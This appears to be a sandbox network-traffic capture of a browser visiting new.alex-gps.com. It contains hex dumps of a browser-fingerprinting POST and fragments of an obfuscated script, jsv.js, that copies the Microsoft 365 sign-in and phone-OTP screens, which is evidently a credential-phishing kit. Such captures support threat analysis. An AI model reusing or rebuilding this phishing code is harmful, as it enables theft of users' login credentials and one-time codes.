                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:33 UTC192INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:33 GMT
                                                      Server: Apache/2.4.59 (Debian)
                                                      Vary: Accept-Encoding
                                                      Content-Length: 4713
                                                      Connection: close
                                                      Content-Type: text/html; charset=UTF-8
                                                      2024-10-23 21:29:33 UTC4713INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0a 20
                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="root">


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.1649632201.102.105.2364436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:34 UTC986OUTPOST /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N HTTP/1.1
                                                      Host: new.alex-gps.com
                                                      Connection: keep-alive
                                                      Content-Length: 139067
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      Origin: https://new.alex-gps.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                      Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66
                                                      Data Ascii: cument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDef
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72
                                                      Data Ascii: ment%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObser
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25
                                                      Data Ascii: lement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73
                                                      Data Ascii: ion+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSens
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35
                                                      Data Ascii: onousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61
                                                      Data Ascii: %2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22Media
                                                      2024-10-23 21:29:34 UTC16384OUTData Raw: 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69
                                                      Data Ascii: bilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegi
                                                      2024-10-23 21:29:34 UTC7995OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c
                                                      Data Ascii: Bnative+code%5D+%7D%22%2C%22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createEl
                                                      2024-10-23 21:29:35 UTC191INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:34 GMT
                                                      Server: Apache/2.4.59 (Debian)
                                                      Vary: Accept-Encoding
                                                      Content-Length: 364
                                                      Connection: close
                                                      Content-Type: text/html; charset=UTF-8
                                                      2024-10-23 21:29:35 UTC364INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 51 54 52 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 54 54 42 4e 56 45 46 33 54 30 52 52 64 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 4f 27 20 63 72
                                                      Data Ascii: <!DOCTYPE html><html id='html' sti='VlZORlVqQTRNVEF5TURJMFZUTTBNVEF3T0RRdw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' cr


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.1649631201.102.105.2364436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:35 UTC610OUTGET /m/jsv.js HTTP/1.1
                                                      Host: new.alex-gps.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:35 UTC282INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:35 GMT
                                                      Server: Apache/2.4.59 (Debian)
                                                      Last-Modified: Tue, 08 Oct 2024 19:11:56 GMT
                                                      ETag: "1f745-623fbe92bf700"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 128837
                                                      Vary: Accept-Encoding
                                                      Connection: close
                                                      Content-Type: text/javascript
                                                      2024-10-23 21:29:35 UTC7910INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 62 61 63
                                                      Data Ascii: function _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/bac
                                                      2024-10-23 21:29:35 UTC8000INData Raw: 32 30 66 61 2d 70 6c 61 79 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 72 6f 74 61 74 65 2d 6c 65 66 74 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61
                                                      Data Ascii: 20fa-play\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-rotate-left\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa
                                                      2024-10-23 21:29:35 UTC8000INData Raw: 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 50 61 73 73 6d 73 61 70 70 42 6c 6f 63 6b 5c 78 32 30 77 33 2d 61 6e 69 6d 61 74 65 2d 72 69 67 68 74 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6d 67 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 4c 6f 67 6f 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f
                                                      Data Ascii: 0\x20<div\x20style=\x22display:\x20none;\x22\x20class=\x22noPassmsappBlock\x20w3-animate-right\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<img\x20class=\x22formLogo\x22\x20src=\x22https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_
                                                      2024-10-23 21:29:35 UTC8000INData Raw: 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c
                                                      Data Ascii: ng\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://l
                                                      2024-10-23 21:29:35 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 42 4f 49 4c 45 52 54 45 58 54 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 67 72 61 79 42 6f 78 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 69 6c 65 72 5c 78 32 30 74 65 78 74 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c
                                                      Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20...\x20BOILERTEXT\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22grayBox\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20boiler\x20text\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20</div>\
